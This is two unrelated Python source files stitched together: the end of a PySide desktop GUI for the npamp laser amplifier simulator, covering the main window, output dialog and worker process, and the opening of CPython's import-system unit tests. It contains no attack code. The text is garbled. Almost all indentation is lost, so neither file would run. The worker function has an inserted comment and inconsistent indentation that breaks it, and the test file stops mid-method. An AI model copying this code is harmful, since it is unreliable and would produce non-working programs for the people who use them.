fp.write("import model\n")
fp.write("\n")
fp.write("%s = %s\n" % ("version", npamp.params.version))
fp.write("\n")
for name, value in predef_attr_reprs:
fp.write("%s = %s\n" % (name, value))
fp.write("\n")
for param, value in sorted(conf.items()):
fp.write("%s = %s\n" % (param, repr_cfg(value)))
fp.write("\n")
for name, _ in predef_attr_reprs:
fp.write("del %s\n" % name)
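# Main window: each configuration parameter is bound to a widget named "<prefix>_<parameter>";
# conf2gui/gui2conf convert between the widget states and an npamp configuration dict.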
class AppWindow(QtGui.QMainWindow, mainwin.Ui_MainWindow):
untitled_name = "Untitled.%s" % meta.file_extension
file_filters = "%s Files (*.%s);;All Files (%s)" % (meta.app_name, meta.file_extension, "*.*" if os.name == "nt" else "*")
def __init__(self, extensions):
QtGui.QMainWindow.__init__(self)
self.extensions = extensions
self.monitor_pipe = multiprocessing.Pipe(False)
self.old_excepthook = None
self.widget_module_map = dict()
self.working_conf = npamp.cfg.copy_conf(defaults)
self.working_path = None
self.output_path = None
self.default_directory = self.get_default_directory()
self.setupUi(self)
self.initWidgets()
self.connectSignals()
self.updateUI()
self.conf2gui(defaults)
self.resize(self.sizeHint())
def add_excepthook(self):
self.old_excepthook = sys.excepthook
sys.excepthook = self.gui_excepthook
def gui_excepthook(self, exc_type, value, traceback):
if debug_mode and self.old_excepthook:
self.old_excepthook(exc_type, value, traceback)
QtGui.QMessageBox.critical(self, "Error", str(value))
def get_default_directory(self):
if os.name == "nt":
import winshell
return winshell.desktop()
else:
home_dir = QtCore.QDir.toNativeSeparators(QtCore.QDir.homePath())
return home_dir
def initWidgets(self):
for name in dir(model.beam):
obj = getattr(model.beam, name)
if type(obj) is type and issubclass(obj, model.beam.BeamProfile) and obj is not model.beam.BeamProfile:
self.comboBox_beam_class.addItem(name)
self.widget_module_map[self.comboBox_beam_class.objectName()] = model.beam
for name in dir(model.pulse):
obj = getattr(model.pulse, name)
if type(obj) is type and issubclass(obj, model.pulse.SinglePulse) and obj is not model.pulse.SinglePulse:
self.comboBox_pulse_class.addItem(name)
self.widget_module_map[self.comboBox_pulse_class.objectName()] = model.pulse
for name in dir(model.depop):
obj = getattr(model.depop, name)
if type(obj) is type and issubclass(obj, model.depop.DepopulationModel) and hasattr(obj, "concrete") and obj.concrete is True:
self.comboBox_depop_model_class.addItem(name)
self.comboBox_ext_alt_depop_model.addItem(name)
self.listWidget_ext_depop_models.addItem(name)
self.widget_module_map[self.comboBox_depop_model_class.objectName()] = model.depop
self.widget_module_map[self.comboBox_ext_alt_depop_model.objectName()] = model.depop
self.widget_module_map[self.listWidget_ext_depop_models.objectName()] = model.depop
for name in dir(model.inverter):
obj = getattr(model.inverter, name)
if type(obj) is type and issubclass(obj, model.inverter.PopulationInverter) and obj is not model.inverter.PopulationInverter:
self.comboBox_inverter_class.addItem(name)
self.widget_module_map[self.comboBox_inverter_class.objectName()] = model.inverter
for name in dir(model.integrator):
obj = getattr(model.integrator, name)
if type(obj) is type and issubclass(obj, model.integrator.NumericalIntegrator) and obj is not model.integrator.NumericalIntegrator:
self.listWidget_integrator_classes.addItem(name)
self.widget_module_map[self.listWidget_integrator_classes.objectName()] = model.integrator
self.listWidget_integrator_classes.resize(self.listWidget_integrator_classes.sizeHint())
for name in dir(model.amplifier):
obj = getattr(model.amplifier, name)
if type(obj) is type and issubclass(obj, model.amplifier.NumericalAmplifier) and obj is not model.amplifier.NumericalAmplifier:
self.listWidget_amplifier_classes.addItem(name)
self.widget_module_map[self.listWidget_amplifier_classes.objectName()] = model.amplifier
self.listWidget_amplifier_classes.resize(self.listWidget_amplifier_classes.sizeHint())
def shortFilename(self):
return os.path.splitext(os.path.basename(self.working_path or self.untitled_name))[0]
def updateUI(self):
filename = self.shortFilename()
self.setWindowTitle("%s - %s" % (filename, meta.gui_app_name))
self.actionClose.setEnabled(self.working_path is not None)
def conf2gui(self, conf):
def set_widget_value(label, widget, value):
if type(widget) is QtGui.QLineEdit:
if type(value) is float:
value = unitconv.convert_to_input(label.text(), value)
widget.setText(repr_cfg(value))
elif type(widget) is QtGui.QSpinBox:
widget.setValue(value)
elif type(widget) is QtGui.QCheckBox:
widget.setChecked(value)
elif type(widget) is QtGui.QComboBox:
widget.setCurrentIndex(widget.findText(value.__name__))
elif type(widget) is QtGui.QListWidget:
widget.setCurrentItem(None, QtGui.QItemSelectionModel.Clear)
for v in value:
item = widget.findItems(v.__name__, QtCore.Qt.MatchExactly|QtCore.Qt.MatchCaseSensitive)[0]
widget.setCurrentItem(item, QtGui.QItemSelectionModel.Select)
elif type(widget) is QtGui.QWidget:
children = [w for w in widget.findChildren(QtGui.QWidget) if w.parent() is widget]
assert len(children) == len(value), "wrong data length"
children.sort(key = lambda item: item.objectName())
for w, v in zip(children, value):
set_widget_value(label, w, v)
else:
assert False, "unhandled widget type"
for parameter, value in conf.items():
children = self.centralWidget().findChildren(QtGui.QWidget, QtCore.QRegExp("^[^_]+_%s$" % parameter))
widgets = [w for w in children if type(w) is not QtGui.QLabel]
labels = [w for w in children if type(w) is QtGui.QLabel]
assert len(widgets) == 1, "none or more than one widget matches parameter name \"%s\"" % parameter
assert len(labels) == 1, "none or more than one label matches parameter name \"%s\"" % parameter
set_widget_value(labels[0], widgets[0], value)
if self.gui2conf() != conf:
raise npamp.cfg.ConfigurationError("invalid parameter value(s)")
def gui2conf(self):
def get_widget_value(label, widget, defval):
def item2class(w, t):
module = self.widget_module_map[w.objectName()]
cls = getattr(module, t)
return cls
if type(widget) is QtGui.QLineEdit:
if type(defval) is float:
value = widget.text()
value = unitconv.convert_from_input(label.text(), value)
return value
else:
glb = dict(predef_attrs)
glb["model"] = npamp.model
return eval(widget.text(), glb)
elif type(widget) is QtGui.QSpinBox:
return widget.value()
elif type(widget) is QtGui.QCheckBox:
return widget.isChecked()
elif type(widget) is QtGui.QComboBox:
return item2class(widget, widget.currentText())
elif type(widget) is QtGui.QListWidget:
clsnames = map(lambda item: item.text(), widget.selectedItems())
classes = map(lambda clsname: item2class(widget, clsname), clsnames)
return list(classes)
elif type(widget) is QtGui.QWidget:
children = [w for w in widget.findChildren(QtGui.QWidget) if w.parent() is widget]
assert len(children) == len(defval), "wrong data length"
children.sort(key = lambda item: item.objectName())
return type(defval)(map(lambda wv: get_widget_value(label, *wv), zip(children, defval)))
else:
assert False, "unhandled widget type"
conf = dict()
for parameter, default in defaults.items():
children = self.centralWidget().findChildren(QtGui.QWidget, QtCore.QRegExp("^[^_]+_%s$" % parameter))
widgets = [w for w in children if type(w) is not QtGui.QLabel]
labels = [w for w in children if type(w) is QtGui.QLabel]
assert len(widgets) == 1, "none or more than one widget matches parameter name \"%s\"" % parameter
assert len(labels) == 1, "none or more than one label matches parameter name \"%s\"" % parameter
value = get_widget_value(labels[0], widgets[0], default)
conf[parameter] = value
return conf
def connectSignals(self):
self.actionNew.triggered.connect(self.onNew)
self.actionOpen.triggered.connect(self.onOpen)
self.actionSave.triggered.connect(self.onSave)
self.actionSaveAs.triggered.connect(self.onSaveAs)
self.actionClose.triggered.connect(self.onCloseFile)
self.actionExecute.triggered.connect(self.onExecute)
self.actionQuit.triggered.connect(self.onQuit)
self.actionAbout.triggered.connect(self.onAbout)
def checkSave(self):
if self.gui2conf() != self.working_conf:
choice = QtGui.QMessageBox.question(self, "Changes Made", "Do you want to save changes to %s?" % self.shortFilename(), QtGui.QMessageBox.Save|QtGui.QMessageBox.Discard|QtGui.QMessageBox.Cancel)
if choice is QtGui.QMessageBox.Save:
return True
elif choice is QtGui.QMessageBox.Discard:
return False
else:
return None
else:
return False
def confirmProceed(self):
save = self.checkSave()
if save is True:
self.save()
return True
elif save is False:
return True
else:
return False
def openFile(self, path):
conf = file2conf(path)
old_conf = self.gui2conf()
try:
self.conf2gui(conf)
except:
self.conf2gui(old_conf)
raise
self.working_conf = conf
self.working_path = path
self.output_path = None
self.updateUI()
def saveAs(self):
default = self.working_path or os.path.join(self.default_directory, self.untitled_name)
path, _ = QtGui.QFileDialog.getSaveFileName(self, "Save As", default, self.file_filters)
if not path:
return False
conf = self.gui2conf()
conf2file(conf, path)
self.working_conf = conf
self.working_path = path
self.output_path = None
self.updateUI()
return True
def save(self):
if self.working_path is not None:
conf = self.gui2conf()
conf2file(conf, self.working_path)
self.working_conf = conf
return True
else:
return self.saveAs()
def onNew(self):
if self.confirmProceed():
self.conf2gui(defaults)
self.working_conf = npamp.cfg.copy_conf(defaults)
self.working_path = None
self.output_path = None
self.updateUI()
def onOpen(self):
if self.confirmProceed():
default = os.path.dirname(self.working_path) if self.working_path else self.default_directory
path, _ = QtGui.QFileDialog.getOpenFileName(self, "Open", default, self.file_filters)
if not path:
return
self.openFile(path)
def onSave(self):
self.save()
def onSaveAs(self):
self.saveAs()
def onCloseFile(self):
if self.working_path is not None:
if self.confirmProceed():
self.working_conf = self.gui2conf()
self.working_path = None
self.output_path = None
self.updateUI()
def onExecute(self):
conf = self.gui2conf()
if conf["graphs"]:
if self.output_path is not None:
output_path = self.output_path
else:
default = os.path.dirname(self.working_path) if self.working_path else self.default_directory
output_path = QtGui.QFileDialog.getExistingDirectory(self, "Output Directory", default)
if not output_path:
return
if os.listdir(output_path):
choice = QtGui.QMessageBox.warning(self, "Directory Not Empty", "The selected directory is not empty.\nDo you want to continue?", QtGui.QMessageBox.Yes|QtGui.QMessageBox.No)
if choice is not QtGui.QMessageBox.Yes:
return
self.output_path = output_path
else:
output_path = None
in_conn, out_conn = multiprocessing.Pipe(False)
proc = multiprocessing.Process(name=meta.app_name, target=worker, args=(self.monitor_pipe, out_conn, conf, output_path, debug_mode))
thr = InputThread(in_conn)
out = OutputWindow(self, proc, thr)
thr.received.connect(out.onOutputRead)
thr.finished.connect(out.onWorkerFinished)
proc.start()
out_conn.close()
thr.start()
out.exec_()
def onQuit(self):
self.close()
def onAbout(self):
text = "%s %s\n\n%s\n%s\n\n%s\n\n%s\n%s\n\n%s" % (meta.app_name, meta.app_version, meta.app_copyright, meta.app_rights, meta.app_description, meta.app_author_msg, meta.app_coauthors_msg, meta.app_website_msg)
text += "\n\n"
if not self.extensions:
text += "No extensions installed."
else:
text += "Installed extensions (name: description):"
for extension in self.extensions:
name, doc = extension.__name__, extension.__doc__
text += "\n%s: %s" % (name, doc)
QtGui.QMessageBox.about(self, "About %s" % meta.app_name, text)
def closeEvent(self, event):
if self.confirmProceed():
event.accept()
else:
event.ignore()
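# Modal dialog that displays the worker process's output as it arrives and
# lets the user stop the computation before it finishes.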
class OutputWindow(QtGui.QDialog, outwin.Ui_Dialog):
def __init__(self, parent, proc, thr):
QtGui.QDialog.__init__(self, parent)
self.proc = proc
self.thr = thr
self.setupUi(self)
self.buttonBox.buttons()[0].setDefault(True)
self.connectSignals()
self.setWindowTitle(meta.app_name + " output")
width = max(self.sizeHint().width(), self.width())
height = max(self.sizeHint().height(), self.height())
self.resize(width, height)
self.setCursor(QtCore.Qt.BusyCursor)
def connectSignals(self):
self.buttonBox.clicked.connect(self.onButtonClicked)
def onButtonClicked(self, button):
buttons = self.buttonBox.buttons()
if button is buttons[0]:
self.stopWorker()
elif button is buttons[1]:
self.close()
else:
assert False, "unhandled button"
def reject(self):
self.close()
def stopWorker(self):
self.proc.terminate()
self.proc.join()
self.thr.wait()
self.buttonBox.buttons()[0].setEnabled(False)
def onOutputRead(self, s):
self.plainTextEdit.appendPlainText(s)
self.plainTextEdit.ensureCursorVisible()
def onWorkerFinished(self):
self.stopWorker()
self.unsetCursor()
def closeEvent(self, event):
self.stopWorker()
event.accept()
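# Background thread that blocks on the pipe from the worker process and
# re-emits each received string as a Qt signal, so the GUI is only updated
# from the main thread.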
class InputThread(QtCore.QThread):
received = QtCore.Signal(str)
finished = QtCore.Signal()
def __init__(self, in_conn):
super(InputThread, self).__init__()
self.in_conn = in_conn
def run(self):
while True:
try:
s = self.in_conn.recv()
except EOFError:
break
self.received.emit(s)
self.in_conn.close()
self.finished.emit()
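# Entry point of the worker process: redirects stdout/stderr into the pipe
# feeding the output window, starts the monitor thread, and runs the
# computation with the configuration taken from the GUI.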
def worker(monitor_pipe, out_conn, conf, output_path, debug_mode):
    # Unpack the monitor pipe here; tuple parameters in a def signature are
    # Python 2-only syntax.
    monitor_in, monitor_out = monitor_pipe
mpout = npamp.mp.MPOutput(out_conn.send)
sys.stdout = sys.stderr = mpout
monitor_out.close()
thr = threading.Thread(target=npamp.mp.monitor_thread, args=(monitor_in,))
thr.daemon = True
thr.start()
npamp.debug_mode = debug_mode
npamp.params.__dict__.update(conf)
npamp.run(None, output_path, None)
def main():
multiprocessing.freeze_support()
signal.signal(signal.SIGINT, signal.SIG_DFL)
app = QtGui.QApplication(sys.argv)
global old_excepthook
old_excepthook = sys.excepthook
sys.excepthook = boot_excepthook
init_app_dir()
opts, args = getopt.getopt(sys.argv[1:], "g")
for opt, _ in opts:
if opt == "-g":
global debug_mode
debug_mode = True
npamp.debug_mode = True
else:
assert False, "unhandled option"
if len(args) > 1:
raise npamp.InvocationError("too many arguments")
extensions = npamp.load_extensions()
win = AppWindow(extensions)
if args:
win.openFile(args[0])
win.show()
sys.excepthook = old_excepthook
win.add_excepthook()
sys.exit(app.exec_())
if __name__ == "__main__":
main()
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import shutil
import subprocess
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import contextlib
import glob
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, is_jython,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@unittest.skipUnless(sys.platform == "win32", "Windows-specific")
def test_dll_dependency_import(self):
from _winapi import GetModuleFileName
dllname = GetModuleFileName(sys.dllhandle)
pydname = importlib.util.find_spec("_sqlite3").origin
depname = os.path.join(
os.path.dirname(pydname),
"sqlite3{}.dll".format("_d" if "_d" in pydname else ""))
with test.support.temp_dir() as tmp:
tmp2 = os.path.join(tmp, "DLLs")
os.mkdir(tmp2)
pyexe = os.path.join(tmp, os.path.basename(sys.executable))
shutil.copy(sys.executable, pyexe)
shutil.copy(dllname, tmp)
for f in glob.glob(os.path.join(sys.prefix, "vcruntime*.dll")):
shutil.copy(f, tmp)
shutil.copy(pydname, tmp2)
env = None
env = {k.upper(): os.environ[k] for k in os.environ}
env["PYTHONPATH"] = tmp2 + ";" + os.path.dirname(os.__file__)
# Test 1: import with added DLL directory
subprocess.check_call([
pyexe, "-Sc", ";".join([
"import os",
"p = os.add_dll_directory({!r})".format(
os.path.dirname(depname)),
"import _sqlite3",
"p.close"
])],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
# Test 2: import with DLL adjacent to PYD
shutil.copy(depname, tmp2)
subprocess.check_call([pyexe, "-Sc", "import _sqlite3"],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
